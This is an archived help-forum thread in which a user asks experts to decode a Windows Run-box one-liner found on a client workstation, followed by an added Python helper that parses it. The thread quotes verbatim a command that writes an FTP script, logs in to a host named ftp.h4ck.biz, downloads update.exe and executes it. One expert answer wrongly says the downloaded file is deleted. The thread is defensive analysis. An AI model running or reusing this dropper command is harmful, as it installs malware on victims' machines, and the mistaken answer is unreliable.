Solved

Decoding hackers code

Posted on 2010-01-06
Last Modified: 2012-05-08
Hi.

I logged onto a client's workstation today to find this in the Run box

cmd /c echo open ftp.h4ck.biz 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit


Please could somebody decode this so I am able to understand this
Question by:apcsolutionsuk
 
LVL 17

Expert Comment

by:CSecurity
ID: 26189601
It's simple.

It connects to ftp.h4ck.biz on the FTP port using the Windows FTP command
Then it enters the username and password, which is temp:temp
I mean username: temp
password: temp

then it downloads update.exe (malware/trojan)

Then it executes the update.exe (the malware) and exits.

That's all
0
 
LVL 22

Expert Comment

by:senad
ID: 26189617
It's downloading an update from an FTP site to your C:\User\temp directory - running it and then deleting it - and then closing.
0
 
LVL 22

Accepted Solution

by:
senad earned 2000 total points
ID: 26189649
-n - Suppresses auto-login upon initial connection
-v - Suppresses verbose display of remote server responses
-s:filename - Specifies a text file containing ftp commands; the commands will automatically run after ftp starts.
0
 
LVL 22

Expert Comment

by:senad
ID: 26189657
ik - That's the name of the file containing FTP commands
0
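
Added example (not part of the original thread or any poster's code): a small Python triage helper that walks the one-liner from the question step by step, rebuilds the `ik` FTP script it writes, and reports what is fetched, run and deleted. The function name `decode` and the report keys are illustrative choices, and the parser assumes plain `&` chaining with no quoting or `^` escapes.

```python
import re

# The one-liner from the question, copied verbatim.
CMD = ("cmd /c echo open ftp.h4ck.biz 21 >> ik &echo user temp temp >> ik "
       "&echo binary >> ik &echo get update.exe >> ik &echo bye >> ik "
       "&ftp -n -v -s:ik &del ik &update.exe &exit")

def decode(cmdline):
    """Walk the '&'-chained steps and rebuild the FTP script they write.

    Simplification: splits on every '&' and ignores quoting and '^' escapes.
    """
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    steps = [s.strip() for s in body.split("&") if s.strip()]
    files = {}  # file name -> lines written into it by echo redirection
    r = {"steps": steps, "script": None, "server": None, "login": None,
         "downloaded": [], "deleted": [], "executed": []}
    for step in steps:
        echo = re.match(r"echo\s+(.*?)\s*(>>?)\s*(\S+)$", step, re.I)
        ftp = re.match(r"ftp(\.exe)?\s.*?-s:(\S+)", step, re.I)
        rm = re.match(r"(?:del|erase)\s+(\S+)$", step, re.I)
        if echo:
            text, op, name = echo.groups()
            if op == ">":          # '>' truncates, '>>' appends
                files[name] = []
            files.setdefault(name, []).append(text)
        elif ftp:
            r["script"] = ftp.group(2)
            for line in files.get(r["script"], []):
                w = line.split() or [""]
                if w[0].lower() == "open":
                    r["server"] = (w[1], int(w[2]) if len(w) > 2 else 21)
                elif w[0].lower() == "user":
                    r["login"] = tuple(w[1:3])
                elif w[0].lower() == "get":
                    r["downloaded"].append(w[-1])  # last word is the local name
        elif rm:
            r["deleted"].append(rm.group(1))
        elif step.split()[0].lower() in (d.lower() for d in r["downloaded"]):
            r["executed"].append(step.split()[0])
    r["drops_and_runs"] = bool(r["executed"])      # fetched file is then run
    r["removes_script"] = r["script"] in r["deleted"]
    r["ftp_script_text"] = "\n".join(files.get(r["script"], []))
    return r

if __name__ == "__main__":
    for key, value in decode(CMD).items():
        print(f"{key}: {value!r}")
```

The report shows that `del ik` removes only the temporary FTP script, while the file named in the `get` line is executed from the current directory and left in place.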
 
LVL 17

Expert Comment

by:CSecurity
ID: 26189726
I should mention that there is no ftp.h4ck.biz

That's a prototype sample script for hackers. There is nothing to worry about this script
0
 

Expert Comment

by:South Mod
ID: 26502362
Hi apcsolutionsuk,

CSecurity has asked (at http://www.experts-exchange.com/Q_25117144.html) for an explanation of why you selected the answer(s) you selected for this question. It would appear the method you chose to close the question was not in keeping with EE policies, and you may like to consider selecting a more suitable answer as the solution or choosing a different disposition for the question altogether.

Experts,

I would appreciate your help in recommending a more suitable form of closure for this question.

Please make your recommendations as to how this request should be closed. Your recommendations may include:

1) Delete / No Refund
2) Delete / Points Refunded
3) Accept one or more comments as the solution.
4) PAQ the question and store it in the knowledgebase, refunding the points

In the case of #3, please be specific and include the specific comment ID(s) which answer this question. To make it easier for us to process this request, when posting the comment ID(s) to use, please post them in the format http:#aCommentID. For example, http:#a12345678.

When making your recommendation, or if you are unsure what you should recommend, please keep the following in mind:

* Was a solution to the original problem found? If so, points should be awarded to the comment(s) which solved the problem.
* Did the Author solve the problem themselves, with Expert input? If so, you should recommend the Author's comment become the 'Accepted' solution, but recommend other Expert comments which should receive a 'split' of their points for contributing to the final solution.
* Did the Author solve the problem without using any of the Expert advice? If so, the question should be PAQ'ed with points refunded.
* If no solution was found, the question should be deleted. Points will not be refunded if the Author has not followed-up on one or more of the Expert suggestions or requests in the thread.

A Moderator will check back on this in about 4 days, at which point we will expect to see an explanation from the Author and a number of recommendations from the participating Experts. If either is not forthcoming, we will assume the unresponsive party is no longer interested in the final disposition of this question, and may close the question in a way which disadvantages you. If neither party responds, it will be at our discretion that the question may be deleted.

If you have any questions, please also post them below and a Moderator will be more than willing to address your concerns.

SouthMod
Community Support Moderator
0
 
LVL 17

Expert Comment

by:CSecurity
ID: 26503306
1st comment of mine was explaining details in easy to understand details.
0
